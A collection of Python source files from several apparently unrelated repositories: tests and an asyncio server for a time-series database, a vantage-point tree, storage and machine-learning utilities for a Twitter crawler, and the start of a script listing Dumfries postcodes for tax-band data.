assert(upsert_return['status'] == TSDBStatus.OK) assert(upsert_return['payload'] == None) # Test Protocol Select (None fields) metadata_dict = {'pk': {'>': 0}} fields = None additional = None select_op = TSDBOp_Select(metadata_dict, fields, additional) select_return = prot._select(select_op) print("Here", select_return) assert(select_return['op'] == 'select') assert(select_return['status'] == TSDBStatus.OK) assert(select_return['payload'][1] == {}) assert(select_return['payload'][2] == {}) # Test Protocol Select metadata_dict = {'pk': {'>': 0}} fields = ['ts'] additional = None select_op = TSDBOp_Select(metadata_dict, fields, additional) select_return = prot._select(select_op) assert(select_return['op'] == 'select') assert(select_return['status'] == TSDBStatus.OK) assert(select_return['payload'][1]['ts'] == ats1) assert(select_return['payload'][2]['ts'] == ats2) # Test Add Trigger add_trigger_op = TSDBOp_AddTrigger('stats', 'insert_ts', ['mean', 'std'], None) prot._add_trigger(add_trigger_op) mod = import_module('procs.stats') storedproc = getattr(mod,'main') assert(server.triggers['insert_ts'] == [('stats', storedproc, None, ['mean', 'std'])]) #prot._insert_ts(TSDBOp_InsertTS(3, ats1)) #time.sleep(1) #inserted_row = server.db.rows[3] #assert(inserted_row['mean'] == ats1) #assert(inserted_row['std'] == ats1) def test_protocol_delete(self): db = DictDB(schema, 'pk') server = TSDBServer(db) prot = TSDBProtocol(server) t1 = [0,1,2,3,4] v1 = [1.0,2.0,3.0,2.0,1.0] ats1 = ts.TimeSeries(t1, v1) t2 = [10,11,12,13,14] v2 = [-1.0,-2.0,-3.0,-2.0,-1.0] ats2 = ts.TimeSeries(t2, v2) insert_op = {} insert_op['pk'] = 1 insert_op['ts'] = ats1 insert_op['op'] = 'insert_ts' # Test Protocol Insert insert_return = prot._insert_ts(insert_op) assert(insert_return['op'] == 'insert_ts') assert(insert_return['status'] == TSDBStatus.OK) assert(insert_return['payload'] == None) inserted_row = server.db.rows[1] assert(inserted_row['pk'] == 1) assert(inserted_row['ts'] == ats1) insert_return2 = prot._insert_ts(insert_op) assert(insert_return2['op'] == 'insert_ts') assert(insert_return2['status'] == TSDBStatus.INVALID_KEY) delete_op = {} delete_op['pk'] = 1 delete_op['op'] = 'delete_ts' delete_return = prot._delete_ts(delete_op) assert(delete_return['op'] == 'delete_ts') assert(delete_return['status'] == TSDBStatus.OK) assert(delete_return['payload'] == None) assert (len(server.db.rows) == 0) delete_return2 = prot._delete_ts(delete_op) assert(delete_return2['op'] == 'delete_ts') assert(delete_return2['status'] == TSDBStatus.INVALID_KEY) def test_protocol_triggers(self): db = DictDB(schema, 'pk') server = TSDBServer(db) prot = TSDBProtocol(server) # Test Add Trigger add_trigger_op = TSDBOp_AddTrigger('stats', 'insert_ts', ['mean', 'std'], None) prot._add_trigger(add_trigger_op) mod = import_module('procs.stats') storedproc = getattr(mod,'main') assert(server.triggers['insert_ts'] == [('stats', storedproc, None, ['mean', 'std'])]) # Test delete Trigger delete_trigger_op = TSDBOp_RemoveTrigger('stats', 'insert_ts') prot._remove_trigger(delete_trigger_op) mod = import_module('procs.stats') storedproc = getattr(mod,'main') assert(server.triggers['insert_ts'] == []) def test_augmented_select(self): db = DictDB(schema, 'pk') server = TSDBServer(db) prot = TSDBProtocol(server) t1 = [0,1,2,3,4] v1 = [1.0,2.0,3.0,2.0,1.0] ats1 = ts.TimeSeries(t1, v1) t2 = [10,11,12,13,14] v2 = [-1.0,-2.0,-3.0,-2.0,-1.0] ats2 = ts.TimeSeries(t2, v2) insert_op = {} insert_op['pk'] = 1 insert_op['ts'] = ats1 insert_op['op'] = 'insert_ts' # Test Protocol Insert insert_return = prot._insert_ts(insert_op) assert(insert_return['op'] == 'insert_ts') assert(insert_return['status'] == TSDBStatus.OK) assert(insert_return['payload'] == None) inserted_row = server.db.rows[1] assert(inserted_row['pk'] == 1) assert(inserted_row['ts'] == ats1) # Test Protocol Select (None fields) metadata_dict = {'pk': {'>': 0}} fields = None additional = None aug_select_op = TSDBOp_AugmentedSelect('corr', ['mean', 'std'], [t2,v2], metadata_dict, additional ) aug_select_return = prot._augmented_select(aug_select_op) assert(aug_select_return['op'] == 'augmented_select') assert(aug_select_return['status'] == TSDBStatus.OK) assert(aug_select_return['payload'] == {1: {'mean': 1.4142135623730403}}) ``` #### File: tests/vptree/test_VPtrees.py ```python from vptree import * import numpy as np data = np.random.rand(200) dataDict = {} for i in range(len(data)): dataDict['key'+str(i+1)] = data[i] allPk = list(dataDict.keys()) testvps = ['key7', 'key10', 'key45', 'key73'] #creating distance function def absdist(VP,allPk): """ Implementing basic absolute distance function """ x = dataDict[VP] y = np.array([dataDict[key] for key in allPk]) return np.abs(x-y) tree = VPtree(allPk, testvps, absdist) vpt = tree.gen_graph() def dist(vp,arg): x = dataDict[vp] return np.abs(x-arg) search_val = np.random.normal(0,5) allDists = np.array([np.abs(search_val - dataDict[p]) for p in allPk]) subset = tree.gen_subset(search_val,dist) closest = min(allPk, key = lambda k:allDists[allPk.index(k)]) assert closest in subset ``` #### File: cs207project/tsdb/tsdb_server.py ```python import asyncio from .dictdb import DictDB from importlib import import_module from collections import defaultdict, OrderedDict from .tsdb_serialization import Deserializer, serialize from .tsdb_error import * from .tsdb_ops import * import procs import json import ast from aiohttp import web def trigger_callback_maker(pk, target, calltomake): def callback_(future): result = future.result() if target is not None: calltomake(pk, dict(zip(target, result))) return result return callback_ class TSDBProtocol(asyncio.Protocol): def __init__(self, server): self.server = server self.deserializer = Deserializer() self.futures = [] def _insert_ts(self, op): try: self.server.db.insert_ts(op['pk'], op['ts']) except ValueError as e: return TSDBOp_Return(TSDBStatus.INVALID_KEY, op['op']) self._run_trigger('insert_ts', [op['pk']]) return TSDBOp_Return(TSDBStatus.OK, op['op']) def _delete_ts(self, op): try: self.server.db.delete_ts(op['pk']) except ValueError as e: return TSDBOp_Return(TSDBStatus.INVALID_KEY, op['op']) self._run_trigger('delete_ts', [op['pk']]) return TSDBOp_Return(TSDBStatus.OK, op['op']) def _upsert_meta(self, op): self.server.db.upsert_meta(op['pk'], op['md']) self._run_trigger('upsert_meta', [op['pk']]) return TSDBOp_Return(TSDBStatus.OK, op['op']) def _select(self, op): loids, fields = self.server.db.select(op['md'], op['fields'], op['additional']) self._run_trigger('select', loids) if fields is not None: d = OrderedDict(zip(loids, fields)) return TSDBOp_Return(TSDBStatus.OK, op['op'], d) else: d = OrderedDict((k,{}) for k in loids) return TSDBOp_Return(TSDBStatus.OK, op['op'], d) def _augmented_select(self, op): "run a select and then synchronously run some computation on it" loids, fields = self.server.db.select(op['md'], None, op['additional']) proc = op['proc'] # the module in procs arg = op['arg'] # an additional argument, could be a constant target = op['target'] #not used to upsert any more, but rather to # return results in a dictionary with the targets mapped to the return # values from proc_main mod = import_module('procs.'+proc) storedproc = getattr(mod,'proc_main') results=[] for pk in loids: row = self.server.db.rows[pk] result = storedproc(pk, row, arg) results.append(dict(zip(target, result))) return TSDBOp_Return(TSDBStatus.OK, op['op'], dict(zip(loids, results))) def _add_trigger(self, op): print('Adding triggers') trigger_proc = op['proc'] # the module in procs trigger_onwhat = op['onwhat'] # on what? eg `insert_ts` trigger_target = op['target'] # if provided, this meta will be upserted trigger_arg = op['arg'] # an additional argument, could be a constant # FIXME: this import should have error handling mod = import_module('procs.'+trigger_proc) storedproc = getattr(mod,'main') self.server.triggers[trigger_onwhat].append((trigger_proc, storedproc, trigger_arg, trigger_target)) return TSDBOp_Return(TSDBStatus.OK, op['op']) def _remove_trigger(self, op): trigger_proc = op['proc'] trigger_onwhat = op['onwhat'] trigs = self.server.triggers[trigger_onwhat] for t in trigs: if t[0]==trigger_proc: trigs.remove(t) return TSDBOp_Return(TSDBStatus.OK, op['op']) def _run_trigger(self, opname, rowmatch): lot = self.server.triggers[opname] print("S> list of triggers to run", lot) for tname, t, arg, target in lot: for pk in rowmatch: row = self.server.db.rows[pk] task = asyncio.ensure_future(t(pk, row, arg)) task.add_done_callback(trigger_callback_maker(pk, target, self.server.db.upsert_meta)) def connection_made(self, conn): print('S> connection made') self.conn = conn def data_received(self, data): print('S> data received ['+str(len(data))+']: '+str(data)) self.deserializer.append(data) if self.deserializer.ready(): msg = self.deserializer.deserialize() status = TSDBStatus.OK # until proven otherwise. response = TSDBOp_Return(status, None) # until proven otherwise. try: op = TSDBOp.from_json(msg) except TypeError as e: response = TSDBOp_Return(TSDBStatus.INVALID_OPERATION, None) if status is TSDBStatus.OK: if isinstance(op, TSDBOp_InsertTS): response = self._insert_ts(op) elif isinstance(op, TSDBOp_DeleteTS): response = self._delete_ts(op) elif isinstance(op, TSDBOp_UpsertMeta): response = self._upsert_meta(op) elif isinstance(op, TSDBOp_Select): response = self._select(op) elif isinstance(op, TSDBOp_AddTrigger): response = self._add_trigger(op) elif isinstance(op, TSDBOp_RemoveTrigger): response = self._remove_trigger(op) else: response = TSDBOp_Return(TSDBStatus.UNKNOWN_ERROR, op['op']) self.conn.write(serialize(response.to_json())) self.conn.close() def connection_lost(self, transport): print('S> connection lost') def rest_hello_world(self, request): return web.Response(body=b"Hello world") #@rest_handler @asyncio.coroutine def post_handler(self, request): data = yield from request.json() status = TSDBStatus.OK # until proven otherwise. response = TSDBOp_Return(status, None) # until proven otherwise. msg = data try: op = TSDBOp.from_json(msg) except TypeError as e: response = TSDBOp_Return(TSDBStatus.INVALID_OPERATION, None) if status is TSDBStatus.OK: if isinstance(op, TSDBOp_InsertTS): response = self._insert_ts(op) elif isinstance(op, TSDBOp_DeleteTS): response = self._delete_ts(op) elif isinstance(op, TSDBOp_UpsertMeta): response = self._upsert_meta(op) elif isinstance(op, TSDBOp_Select): response = self._select(op) elif isinstance(op, TSDBOp_AddTrigger): response = self._add_trigger(op) elif isinstance(op, TSDBOp_RemoveTrigger): response = self._remove_trigger(op) else: response = TSDBOp_Return(TSDBStatus.UNKNOWN_ERROR, op['op']) return web.json_response(response.to_json()) class TSDBServer(object): def __init__(self, db, port=9999): self.port = port self.db = db self.triggers = defaultdict(list) self.autokeys = {} def exception_handler(self, loop, context): print('S> EXCEPTION:', str(context)) loop.stop() def run(self, testing=False): loop = asyncio.get_event_loop() # NOTE: enable this if you'd rather have the server stop on an error # currently it dumps the protocol and keeps going; new connections # are unaffected. Rather nice, actually. #loop.set_exception_handler(self.exception_handler) self.listener = loop.create_server(lambda: TSDBProtocol(self), '127.0.0.1', self.port) print('S> Starting TSDB server on port',self.port) listener = loop.run_until_complete(self.listener) try: loop.run_forever() except KeyboardInterrupt: print('S> Exiting.') except Exception as e: print('S> Exception:',e) finally: listener.close() loop.close() def rest_run(self): loop = asyncio.get_event_loop() app = web.Application() tsdbproc = TSDBProtocol(self) app.router.add_route('GET', '/', tsdbproc.rest_hello_world) app.router.add_route('POST', '/', tsdbproc.post_handler) self.listener = loop.create_server(app.make_handler(), '127.0.0.1', self.port) print('S> Starting REST TSDB server on port',self.port) listener = loop.run_until_complete(self.listener) try: loop.run_forever() except KeyboardInterrupt: print('S> Exiting.') except Exception as e: print('S> Exception:',e) finally: listener.close() loop.close() if __name__=='__main__': empty_schema = {'pk': {'convert': lambda x: x, 'index': None}} db = DictDB(empty_schema, 'pk') TSDBServer(db).run() ``` #### File: cs207project/vptree/vptree.py ```python import uuid import numpy as np import graphviz as gv class vpnode(): def __init__(self): self.parent = None self.leftChild = None self.rightChild = None #Using preorder in a similar way as the lab #returns a list and not a generator object def preorder(self): if self.rightChild == None and self.leftChild == None: return [(self, None, None)] else: return [(self, self.leftChild, self.rightChild)] + self.leftChild.preorder() + self.rightChild.preorder() #Since a VP tree has two kind of nodes - non-leaf nodes with vantage points and leaf nodes with closest possible candidates. class vpnodeVP(vpnode): """ Intermediate nodes with vantage points """ def __init__(self, uid, pk, median, leftChild, rightChild): """ pk - future input from timeseries - currently the id for the test timeseries """ #Inheriting from the base class super().__init__() self.uid = uid self.pk = pk self.median = median self.leftChild = leftChild self.rightChild = rightChild class vpnodeLeaf(vpnode): """ Leaf nodes with primary key lists with the closest matches """ def __init__(self, uid, pkList): super().__init__() self.uid = uid self.pkList = pkList #Building the tree class class VPtree(): """ Main tree class """ def __init__(self, allPk, vpList, dfunc): """ allPK - List of all primary keys vpList - List of vantage points dfunc - distance function """ self.vpList = vpList self.dfunc = dfunc self.root = self.maketree(allPk, vpList) def maketree(self, allPk, vpList): #Making an id for the node: uid = uuid.uuid4().int % 10000 #checking if there are vantage points left #if we have none left, its just the vpnodeLeaf node if vpList == []: return vpnodeLeaf(uid, allPk) else: #Decide how to pick vantage point #Currently using random selection index = np.random.choice(range(len(vpList))) VP = vpList[index] #Computing distance for all points VPdist = self.dfunc(VP, allPk) median = np.median(VPdist) #Assigning if left or right #initializing empty lists left_PK, left_VP, right_PK, right_VP = [], [], [], [] for key, dist in zip(allPk, VPdist): if dist < median : #assigning left left_PK.append(key) if key in vpList and key != VP: #add the key to vantage key list left_VP.append(key) else: right_PK.append(key) if key in vpList and key != VP: #add key to vantage key list right_VP.append(key) leftChild = self.maketree(left_PK, left_VP) rightChild = self.maketree(right_PK, right_VP) #creating root node node = vpnodeVP(uid, VP, median, leftChild, rightChild) #setting parents rightChild.parent = node leftChild.parent = node return node def gen_graph(self): """ Visualize the tree """ graph = gv.Digraph(format='svg') for parent, leftChild, rightChild in self.root.preorder(): if isinstance(parent,vpnodeLeaf): graph.node(str(parent.uid), "Leaf:: "+str(parent.pkList)) if isinstance(parent,vpnodeVP): graph.node(str(parent.uid), """Vantage point:: Key={} medianDist = {:3.3f} """.format(parent.pk, parent.median)) graph.edge(str(parent.uid), str(leftChild.uid)) graph.edge(str(parent.uid), str(rightChild.uid)) return graph def gen_subset(self, search_val, dfunc): """Get the subset of nodes that can be the closest to this argument INPUT search_val - search value dfunc - distance function """ current = self.root while not isinstance(current,vpnodeLeaf): d = dfunc(current.pk, search_val) if d > current.median: current = current.rightChild else: current = current.leftChild return current.pkList """ if __name__ == "__main__": data = np.random.rand(200) dataDict = {} for i in range(len(data)): dataDict['key'+str(i+1)] = data[i] allPk = list(dataDict.keys()) testvps = ['key7', 'key10', 'key45', 'key73'] #creating distance function def absdist(VP,allPk): #Implementing basic absolute distance function x = dataDict[VP] y = np.array([dataDict[key] for key in allPk]) return np.abs(x-y) tree = VPtree(allPk, testvps, absdist) vpt = tree.gen_graph() vpt.render("vptree.gv") def dist(vp,arg): x = dataDict[vp] return np.abs(x-arg) search_val = np.random.normal(0,5) allDists = np.array([np.abs(search_val - dataDict[p]) for p in allPk]) subset = tree.gen_subset(search_val,dist) closest = min(allPk, key = lambda k:allDists[allPk.index(k)]) assert closest in subset """ ```
{ "source": "2087829p/smores", "score": 3 }
#### File: smores/smores/storage.py ```python __author__ = '<NAME>' import os import pickle import time import threading import constants from concurrent import futures import Queue def __abs_path__(fl): curr_dir = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__))) abs_file_path = os.path.join(curr_dir, fl) return abs_file_path def load_data(f): data = [] file_path = __abs_path__(f) if not os.path.exists(file_path): open(file_path, 'w+').close() return data with open(file_path, 'rb') as handle: try: data = pickle.load(handle) except Exception as e: print "error while opening file " + f + ' cause: ' + e.message return data def save_data(data, fl, append=False): if constants.TESTING: return file_path = __abs_path__(fl) if not os.path.exists(os.path.dirname(file_path)): try: os.makedirs(os.path.dirname(file_path)) except: print "could not create missing directory" return if append: data += load_data(fl) with open(file_path, 'wb') as handle: try: pickle.dump(data, handle) except Exception as e: print "could not save data to file %s cause: %s" % (fl,e.message) def load_explorer_data(): import constants as c bulk_lists=load_data(c.TWITTER_BULK_LIST_STORAGE) lists = load_data(c.TWITTER_LIST_STORAGE) users = load_data(c.TWITTER_USER_STORAGE) remaining = load_data(c.TWITTER_CANDIDATES_STORAGE) data={'remaining':remaining if remaining else[], 'bulk_lists': bulk_lists if bulk_lists else [], 'total_followed': users if users else [], 'user_lists': lists if lists else []} return data class Format_Error(Exception): def __init__(self, value): self.value = value def __str__(self): return repr(self.value) def read_login(f): data = [] file_path = __abs_path__(f) if not os.path.exists(file_path): open(file_path, 'w').close() return data with open(file_path, 'r') as handle: content = handle.readlines() for l in content: data_entry = {} l = l.strip('\n') l = l.strip("[]") entry = l.split(',') for e in entry: d = e.split(":") if (len(d) != 2): raise Format_Error("Unable to parse credentials file due to error in formatting") data_entry[d[0]] = d[1] data.append(data_entry) return data def save_candidates(candidates): save_data(candidates,constants.TWITTER_CANDIDATES_STORAGE) # 1 db per day # 1 collection per hour # as many tweets as possible aka documents # if time == available then https://www.sitepoint.com/caching-a-mongodb-database-with-redis/ class StorageSystem: def __init__(self, ip, port, thread_count): self.ip = ip self.port = port self._current_db = time.strftime("%x") # sets the name of the current db to the current date self._current_collection = time.strftime( "%X") # set the current collection to the current time aka current hour self._pool = futures.ThreadPoolExecutor(max_workers=thread_count) # NEVER TO BE CALLED BY ANYONE BUT SCHEDULER def switch_db_context(self): self._current_db = time.strftime("%x") # TO BE USED ONLY FOR TESTING def set_db_context(self, c): self._current_db = c # NOT TO BE CALLED BY USER MUST BE CALLED ONLY BY SCHEDULER def switch_collection_context(self): self._current_collection = time.strftime("%X") def __perform_write__(self, data, ip, port, **kwargs): 'Write the new data to the specified server' import pymongo try: mongo = pymongo.MongoClient(ip, port) db = mongo[kwargs['current_db']] db[kwargs['current_collection']].insert_many(data, False) mongo.close() except: raise ValueError('MongoDB server ' + ip + ':' + str(port) + ' endpoint data is incorrect or server is down') def write(self, data): 'Enqueue data that the storage system will attempt to save' self._pool.submit(self.__perform_write__, data, self.ip, self.port, current_db=self._current_db, current_collection=self._current_collection) def shutdown(self): print "Storage system is shutting down please wait for all pending IO tasks to complete" self._pool.shutdown(True) # http://www.bogotobogo.com/python/Multithread/python_multithreading_Synchronization_Condition_Objects_Producer_Consumer.php class Filter(threading.Thread): # service used to specify which task should results should be fed to filter refer to service plugins in constants.py def __init__(self, service, store, filters): threading.Thread.__init__(self) self._for = service self._data = Queue.Queue() self._store = store self._plugins = filters self._cond = threading.Condition() self._lock = threading.Lock() self.daemon = True self._running = True # self.start() def set_store(self, store): self._store = store def data_available(self, data): 'Notify the plugin that new data is available for processing' self._data.put(data) with self._lock: with self._cond: self._cond.notify() def start(self): threading.Thread.start(self) if not self._plugins: return for p in self._plugins: p.start() def interrupt(self): 'Terminate plugin and its pipeline' with self._lock: self._running = False with self._cond: self._cond.notify() if self._plugins: for p in self._plugins: p.interrupt() def register_plugin(self, p): 'Add new plugin to the end of the pipeline' if isinstance(p, Filter): self._plugins.append(p) def run(self): while self._running: while self._data: data = self.process(self._data.get()) self._data.task_done() if self._store: self._store(data) if self._plugins: for p in self._plugins: p.data_available(data) self._cond.wait() def process(self, data): 'Processes the input data must be overridden and implemented in every class that subclasses this one' raise NotImplementedError() ``` #### File: smores/smores/utils.py ```python __author__ = '<NAME>' import threading import numpy as np from constants import * import math import time import constants as c def split_into(l, n): 'Splits the list into smaller lists with n elements each' for i in xrange(0, len(l), n): yield l[i:i + n] def fit_in_range(min, max, x): """fits a number(x) within a specified range between min and max""" return (x - min) / (max - min) # coverts twitter timestamp to system time in seconds since Unix epoch get_tweet_timestamp = lambda t:time.mktime(time.strptime(t["created_at"], "%a %b %d %H:%M:%S +0000 %Y")) # flattens a multidimensional array into a 1-dimensional array flatten = lambda l: [i for sl in l for i in sl] # removes Twitter accounts that are protected or have to few tweets to be deemed active user_filter = lambda x:filter(lambda y:y['protected']==False and y['statuses_count']>c.MIN_TWITTER_STATUSES_COUNT,x) # a handy functional expression to check if the trends data is data or list of locations for which we want trends contains_locations = lambda x: isinstance(x, list) and any( [('location' in i or 'woeid' in i or 'lat' in i or 'long' in i) for i in x]) # determines whether a string contains only ascii characters all_ascii = lambda x:all(ord(c) < 128 for c in x) class KMeanClassifier: def __init__(self): self._pos = [1.0 for _ in xrange(RUNNING_CYCLE)] self._pos_size = 0 self._neg = [1.0 for _ in xrange(RUNNING_CYCLE)] self._neg_size = 0 def train(self, s, r): #s-sample,r-result what we've actually observed s = np.log(s) if r == 1: # train positive classifier self._pos_size += 1 self._pos = map(lambda m, x: m + ((x - m) / self._pos_size), self._pos, s) else: # train negative classifier self._neg_size += 1 self._neg = map(lambda m, x: m + ((x - m) / self._neg_size), self._neg, s) def __dist__(self, x, y): return np.sqrt((x - y) ** 2) def predict(self, s): s = np.log(s) gamma = 1.0 return np.mean([math.exp(-gamma * d) for d in map(self.__dist__, s, self._pos)]) \ / np.mean([math.exp(-gamma * d) for d in map(self.__dist__, s, self._neg)]) class NeuralNetwork: def __init__(self, num_inputs, num_outputs,mlp=False): self._size_in = num_inputs self._size_out = num_outputs if not mlp: self._w = [self.__gen_layer__(num_inputs,num_outputs)] self._setup = True else: self._setup = False self._w = [] def __gen_layer__(self, in_size, out_size): return 2 * np.random.random((in_size, out_size)) - 1 def add_hidden_layer(self, num_neurons): if not self._w: self._w.append(self.__gen_layer__(self._size_in, num_neurons)) else: self._w.append(self.__gen_layer__(self._w[-1].shape[1], num_neurons)) def __sigmoid__(self, x, deriv=False): if (deriv == True): return x * (1 - x) return 1 / (1 + np.exp(-x)) def train(self, X, y, epochs=1): #X-input,y-observed result if not self._w: self._w.append(self.__gen_layer__(self._size_in, self._size_out)) self._setup = True elif not self._setup: self._w.append(self.__gen_layer__(self._w[-1].shape[1], self._size_out)) self._setup = True for i in xrange(epochs): # propagate forward l0 = X l1 = [l0] for l in range(len(self._w)): l0 = self.__sigmoid__(np.dot(l0, self._w[l])) l1.append(l0) err = y - l0 #calculate error delta = err * self.__sigmoid__(l0, True)#calculate the gradient of the error for the output layer if len(self._w) > 1: self._w[-1] += l0.T.dot(delta) #update the output layer's weights for j in xrange(len(self._w) - 2, 0, -1): l_err = delta.dot(self._w[j+1].T)#calculate the error for each layer going backwards l_delta = l_err * self.__sigmoid__(l1[j], deriv=True)#calculate the gradient self._w[j] += l1[j].T.dot(l_delta)#update the weight delta = l_delta # remember the gradient so we can use it in the next epoch else: self._w[-1] += np.dot(l0.T, delta) def predict(self, X): lo = X for l in xrange(len(self._w)): lo = self.__sigmoid__(np.dot(lo, self._w[l])) return lo class CrawlTimer(threading.Thread): # ref:http://stackoverflow.com/questions/9812344/cancellable-threading-timer-in-python def __init__(self, wait_for, function, **kwargs): threading.Thread.__init__(self) self.event = threading.Event() self.fs = [(function, kwargs)] if function else [] self.timeout = wait_for def add_function(self, f, **kwargs): self.fs.append((f, kwargs)) def run(self): while not self.event.is_set(): for i in range(len(self.fs)): fx = self.fs[i] if fx[1]: fx[0](fx[1]) else: fx[0]() self.event.wait(self.timeout) def stop(self): self.event.set() ```
{ "source": "2090886l/IneqBench", "score": 3 }
#### File: IneqBench/TaxBands-Data-and-Script/script.py ```python import urllib.request import re import csv array = """DG1 1DF DG1 1DG DG1 1DJ DG1 1DL DG1 1DR DG1 1DT DG1 1DU DG1 1DX DG1 1EA DG1 1EB DG1 1ED DG1 1EF DG1 1EG DG1 1EH DG1 1EJ DG1 1EL DG1 1ET DG1 1EW DG1 1EX DG1 1FA DG1 1GL DG1 1GN DG1 1GP DG1 1GQ DG1 1GZ DG1 1AA DG1 1AG DG1 1BA DG1 1BD DG1 1BF DG1 1BG DG1 1BH DG1 1BJ DG1 1BL DG1 1BS DG1 1BT DG1 1BU DG1 1BW DG1 1BX DG1 1BY DG1 1BZ DG1 1DA DG1 1DB DG1 1DD DG1 1DE DG1 1HA DG1 1HB DG1 1HD DG1 1HE DG1 1HF DG1 1HH DG1 1HJ DG1 1HL DG1 1HN DG1 1HP DG1 1HR DG1 1HS DG1 1HU DG1 1HW DG1 1HX DG1 1HY DG1 1HZ DG1 1JA DG1 1JB DG1 1JD DG1 1JE DG1 1JF DG1 1JG DG1 1JL DG1 1JN DG1 1JP DG1 1JQ DG1 1JR DG1 1JU DG1 1JW DG1 1JX DG1 1JY DG1 1JZ DG1 1LG DG1 1LN DG1 1LP DG1 1LR DG1 1LS DG1 1LT DG1 1LU DG1 1LW DG1 1LX DG1 1LZ DG1 1NA DG1 1NE DG1 1NF DG1 1NH DG1 1NJ DG1 1NL DG1 1NN DG1 1NP DG10 9NT DG10 9NU DG10 9NW DG10 9NX DG10 9PA DG10 9PB DG10 9PD DG10 9PE DG10 9PF DG10 9PG DG10 9PH DG10 9PJ DG10 9PL DG10 9PN DG10 9PP DG10 9PQ DG10 9PR DG10 9PS DG10 9PT DG10 9PU DG10 9PW DG10 9PX DG10 9PY DG10 9PZ DG10 9QA DG10 9QB DG10 9QF DG10 9QG DG10 9QH DG10 9QJ DG1 1NQ DG1 1NR DG1 1NS DG1 1NT DG1 1NW DG1 1NY DG1 1NZ DG1 1PA DG1 1PB DG1 1PD DG1 1PE DG1 1PF DG1 1PG DG1 1PJ DG1 1PL DG1 1PP DG1 1PW DG1 1PX DG1 1PZ DG1 1QA DG1 1QB DG1 1QD DG1 1QE DG1 1QF DG1 1QG DG1 1QH DG1 1QJ DG1 1QL DG1 1QN DG1 1QP DG1 1QQ DG1 1QR DG1 1QS DG1 1QU DG1 1QW DG1 1QX DG1 1QY DG1 1QZ DG1 1RA DG1 1RB DG1 1RD DG1 1RE DG1 1RF DG1 1RG DG1 1RH DG1 1RJ DG1 1RL DG1 1RN DG1 1RP DG1 1RQ DG1 1RR DG1 1RS DG1 1RT DG1 1RU DG1 1RX DG1 1RY DG1 1RZ DG1 1SA DG1 1SD DG1 1SE DG1 1SF DG1 1SG DG1 1SH DG1 1SJ DG1 1SL DG1 1SP DG1 1SQ DG1 1SR DG1 1SS DG1 1ST DG1 1SU DG1 1SW DG1 1SX DG1 1SY DG1 1SZ DG1 1TA DG1 1TB DG1 1TD DG1 1TE DG1 1TF DG1 1TG DG1 1TH DG1 1TN DG1 1TP DG1 1TQ DG1 1TR DG1 1TS DG1 1TT DG1 1TU DG1 1TW DG1 1TX DG1 1TY DG1 1TZ DG1 1UA DG1 1UB DG1 1UD DG1 1UF DG1 1UG DG1 1UH DG1 1UJ DG1 1UL DG1 1UN DG1 1UP DG1 1UQ DG1 1UR DG1 1US DG1 1UT DG1 1UU DG1 1UW DG1 1UX DG1 1UY DG1 1UZ DG1 1WD DG1 1XA DG1 1XB DG1 1XD DG1 1XE DG1 1XF DG1 1XG DG1 1XH DG1 1XJ DG1 1XL DG1 1XN DG1 1XP DG1 1XQ DG1 1XR DG1 1XS DG1 1XW DG1 2AA DG1 2AB DG1 2AD DG1 2AG DG1 2AH DG1 2AL DG1 2AN DG1 2AP DG1 2AT DG1 2AW DG1 2AX DG1 2BA DG1 2BD DG1 2BG DG1 2BH DG1 2BJ DG1 2BN DG1 2BQ DG1 2BS DG1 2BT DG1 2BU DG1 2BY DG1 2DA DG1 2DB DG1 2DD DG1 2DE DG1 2DF DG1 2DL DG1 2DN DG1 2DP DG1 2DR DG1 2DS DG1 2DT DG1 2DU DG1 2DX DG1 2DY DG1 2DZ DG1 2EB DG1 2ED DG1 2EE DG1 2EF DG1 2EJ DG1 2EL DG1 2EN DG1 2EP DG1 2EQ DG1 2ER DG1 2ET DG1 2EU DG1 2EW DG1 2EX DG1 2EY DG1 2EZ DG1 2GB DG1 2HA DG1 2HB DG1 2HD DG1 2HE DG1 2HF DG1 2HG DG1 2HH DG1 2HJ DG1 2HL DG1 2HN DG1 2HP DG1 2HQ DG1 2HR DG1 2HS DG1 2HT DG1 2HU DG1 2JA DG1 2JB DG1 2JD DG1 2JE DG1 2JF DG1 2JG DG1 2JH DG1 2JJ DG1 2JL DG1 2JN DG1 2JP DG1 2JQ DG1 2JR DG1 2JS DG1 2JT DG1 2JU DG1 2JW DG1 2JX DG1 2JY DG1 2JZ DG1 2LA DG1 2LB DG1 2LE DG1 2LF DG1 2LH DG1 2LJ DG1 2LL DG1 2LP DG1 2LQ DG1 2LR DG1 2LS DG1 2LT DG1 2LU DG1 2LX DG1 2LZ DG1 2NJ DG1 2NN DG1 2NP DG1 2NS DG1 2NT DG1 2NU DG1 2NX DG1 2NZ DG1 2PA DG1 2PB DG1 2PE DG1 2PF DG1 2PG DG1 2PH DG1 2PJ DG1 2PL DG1 2PN DG1 2PP DG1 2PQ DG1 2PR DG1 2PS DG1 2PW DG1 2PX DG1 2PY DG1 2PZ DG1 2QB DG1 2QD DG1 2QE DG1 2QF DG1 2QG DG1 2QH DG1 2QL DG1 2QN DG1 2QP DG1 2QQ DG1 2QR DG1 2QS DG1 2QT DG1 2RA DG1 2RB DG1 2RE DG1 2RF DG1 2RL DG1 2RN DG1 2RP DG1 2RQ DG1 2RR DG1 2RS DG1 2RT DG1 2RU DG1 2RW DG1 2RX DG1 2RY DG1 2RZ DG1 2SA DG1 2SD DG1 2SG DG1 2SH DG1 2YA DG1 3AB DG1 3AD DG1 3AE DG1 3AG DG1 3AH DG1 3AJ DG1 3AL DG1 3AN DG1 3AP DG1 3AQ DG1 3AR DG1 3AS DG1 3AT DG1 3AU DG1 3AW DG1 3AX DG1 3AY DG1 3AZ DG1 3BA DG1 3BB DG1 3BD DG1 3BE DG1 3BH DG1 3BJ DG1 3BL DG1 3BN DG1 3BP DG1 3BQ DG1 3BW DG1 3BX DG1 3BY DG1 3BZ DG1 3DA DG1 3DB DG1 3DD DG1 3DF DG1 3DG DG1 3DJ DG1 3DL DG1 3DN DG1 3DP DG1 3DQ DG1 3DR DG1 3DS DG1 3DT DG1 3DU DG1 3DW DG1 3DY DG1 3EB DG1 3ED DG1 3EE DG1 3EF DG1 3EG DG1 3EJ DG1 3EN DG1 3EP DG1 3EQ DG1 3ES DG1 3ET DG1 3EU DG1 3EW DG1 3EX DG1 3EY DG1 3EZ DG1 3FB DG1 3FD DG1 3FE DG1 3FF DG1 3FG DG1 3FL DG1 3FN DG1 3FP DG1 3FQ DG1 3FS DG1 3FT DG1 3FW DG1 3FX DG1 3FY DG1 3FZ DG1 3GA DG1 3GB DG1 3GD DG1 3GE DG1 3GG DG1 3GR DG1 3GS DG1 